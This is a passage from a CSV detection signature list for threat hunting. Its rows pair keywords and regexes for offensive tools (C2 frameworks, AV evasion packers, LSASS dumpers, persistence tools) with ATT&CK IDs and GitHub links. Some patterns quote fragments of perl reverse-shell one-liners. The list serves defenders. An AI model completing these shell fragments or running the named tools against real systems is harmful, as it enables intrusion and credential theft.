T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe_packer\exe_main.c*",".{0,1000}pe_packer\\exe_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe_packer\main.c*",".{0,1000}pe_packer\\main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe_packer_exe.exe*",".{0,1000}pe_packer_exe\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe2sh.exe*",".{0,1000}pe2sh\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*pe2shc.exe *",".{0,1000}pe2shc\.exe\s.{0,1000}","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 
T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","0","N/A","N/A","10","2203","411","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" "*pe2shc.exe*",".{0,1000}pe2shc\.exe.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*pe2shc_*.zip*",".{0,1000}pe2shc_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*Pe2Shellcode.py*",".{0,1000}Pe2Shellcode\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Peaky-XD/webshell*",".{0,1000}Peaky\-XD\/webshell.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*PEASS-ng-master*",".{0,1000}PEASS\-ng\-master.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*peCloak*",".{0,1000}peCloak.{0,1000}","offensive_tool_keyword","peCloak","peCloak.py (beta) - A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool","T1027.002 - T1059.003 - T1140 - T1562.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/v-p-b/peCloakCapstone/blob/master/peCloak.py","1","0","N/A","N/A","2","102","39","2016-03-21T23:38:15Z","2015-08-19T14:46:50Z" "*peiga/DumpThatLSASS*",".{0,1000}peiga\/DumpThatLSASS.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - 
T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*peinject.rb*",".{0,1000}peinject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*peinjector.rb*",".{0,1000}peinjector\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*PELoader/PeLoader.*",".{0,1000}PELoader\/PeLoader\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*pem2john.py*",".{0,1000}pem2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Pennyw0rth/NetExec*",".{0,1000}Pennyw0rth\/NetExec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*-pentest*",".{0,1000}\-pentest.{0,1000}","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. 
repository or command line","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*pentest\\sam.hive*",".{0,1000}pentest\\\\sam\.hive.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*pentest\\system.hive*",".{0,1000}pentest\\\\system\.hive.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*PentestBox*",".{0,1000}PentestBox.{0,1000}","offensive_tool_keyword","pentestbox","PentestBox is an Opensource PreConfigured Portable Penetration Testing Environment for the Windows Operating System","T1043 - T1059 - T1078 - T1082 - T1083 - T1092 - T1095 - T1102 - T1123 - T1132 - T1134 - T1135 - T1140 - T1204 - T1218 - T1219 - T1222 - T1247 - T1496 - T1497 - T1543 - T1552 - T1553 - T1574 - T1583 - T1588 - T1592 - T1596 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://pentestbox.org/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PENTESTING-BIBLE*",".{0,1000}PENTESTING\-BIBLE.{0,1000}","offensive_tool_keyword","PENTESTING-BIBLE","pentest documentation - Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY.","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE","1","1","N/A","N/A","10","12693","2314","2023-04-03T07:40:28Z","2019-06-28T11:26:57Z" "*pentest-machine*",".{0,1000}pentest\-machine.{0,1000}","offensive_tool_keyword","pentest-machine","Automates some pentesting work via an nmap XML file. 
As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/. Runs fast-returning commands first. Please send me protocols/commands/options that you would like to see included.","T1583 - T1584 - T1580 - T1582 - T1574","TA0002 - TA0001 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/DanMcInerney/pentest-machine","1","1","N/A","N/A","4","315","102","2018-09-07T20:01:41Z","2015-02-26T23:57:21Z" "*pentestmonkey*",".{0,1000}pentestmonkey.{0,1000}","offensive_tool_keyword","Github Username","github repo name - privileges exploitation and offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/pentestmonkey","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*pentestmonkey/php-reverse-shell*",".{0,1000}pentestmonkey\/php\-reverse\-shell.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*pentestmonkey@pentestmonkey.net*",".{0,1000}pentestmonkey\@pentestmonkey\.net.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*PE-Obfuscator.exe*",".{0,1000}PE\-Obfuscator\.exe.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*PE-Obfuscator.git*",".{0,1000}PE\-Obfuscator\.git.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with 
Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*PE-Obfuscator-main*",".{0,1000}PE\-Obfuscator\-main.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*Pepitoh/VBad*",".{0,1000}Pepitoh\/VBad.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "*perfdata.portswigger.net*",".{0,1000}perfdata\.portswigger\.net.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. 
and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PerfExec.sln*",".{0,1000}PerfExec\.sln.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","75","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "*PerfExec-main.zip*",".{0,1000}PerfExec\-main\.zip.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","75","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "*Perform AS-REP roasting*",".{0,1000}Perform\sAS\-REP\sroasting.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*Perform full attack chain. Options are identical to RELAY. Tool must be on disk*",".{0,1000}Perform\sfull\sattack\schain\.\sOptions\sare\sidentical\sto\sRELAY\.\sTool\smust\sbe\son\sdisk.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*Perform password spraying for all active users on a domain*",".{0,1000}Perform\spassword\sspraying\sfor\sall\sactive\susers\son\sa\sdomain.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*perform_privilege_escalation_checks(*",".{0,1000}perform_privilege_escalation_checks\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*Performing recursive ShadowSpray attack*",".{0,1000}Performing\srecursive\sShadowSpray\sattack.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*Performs a kerberoasting attack against targeted*",".{0,1000}Performs\sa\skerberoasting\sattack\sagainst\stargeted.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*Perfusion.exe -c*",".{0,1000}Perfusion\.exe\s\-c.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*Perfusion\RegistryPatch.ps1*",".{0,1000}Perfusion\\RegistryPatch\.ps1.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" 
"*Perfusion-master.zip*",".{0,1000}Perfusion\-master\.zip.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*perl -e 'use Socket;$*;socket(S,PF_INET,SOCK_STREAM,getprotobyname*",".{0,1000}perl\s\-e\s\'use\sSocket\;\$.{0,1000}\;socket\(S,PF_INET,SOCK_STREAM,getprotobyname.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*perl -MIO -e *new IO::Socket::INET(PeerAddr,""*:*"");STDIN->fdopen(*",".{0,1000}perl\s\-MIO\s\-e\s.{0,1000}new\sIO\:\:Socket\:\:INET\(PeerAddr,\"".{0,1000}\:.{0,1000}\""\)\;STDIN\-\>fdopen\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*perl nikto.pl -h*",".{0,1000}perl\snikto\.pl\s\-h.{0,1000}","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","0","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*perl_no_sh_reverse_tcp.py*",".{0,1000}perl_no_sh_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*perl-reverse-shell.*",".{0,1000}perl\-reverse\-shell\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Permits to backup a DACL before a modification*",".{0,1000}Permits\sto\sbackup\sa\sDACL\sbefore\sa\smodification.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*PersAutorun.cs*",".{0,1000}PersAutorun\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PersCLRInstall.cs*",".{0,1000}PersCLRInstall\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*persist exceladdin*",".{0,1000}persist\sexceladdin.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*persist logonscript*",".{0,1000}persist\slogonscript.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - 
TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*persist run *hkcu*",".{0,1000}persist\srun\s.{0,1000}hkcu.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*persist run *hklm*",".{0,1000}persist\srun\s.{0,1000}hklm.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*persist runkey*",".{0,1000}persist\srunkey.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*persist spe *.exe*",".{0,1000}persist\sspe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" 
"*Persist.cna*",".{0,1000}Persist\.cna.{0,1000}","offensive_tool_keyword","AggressorScripts-1","persistence script for cobaltstrike. Persistence Aggressor Scripts for Cobalt Strike 3.0+","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/AggressorScripts-1/tree/master/Persistence","1","1","N/A","N/A","1","2","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z" "*Persist\autorun.cs*",".{0,1000}Persist\\autorun\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*Persist\eventviewer.cs*",".{0,1000}Persist\\eventviewer\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*Persist\powershell.cs*",".{0,1000}Persist\\powershell\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*Persist\screensaver.cs*",".{0,1000}Persist\\screensaver\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*Persist\startup.cs*",".{0,1000}Persist\\startup\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist 
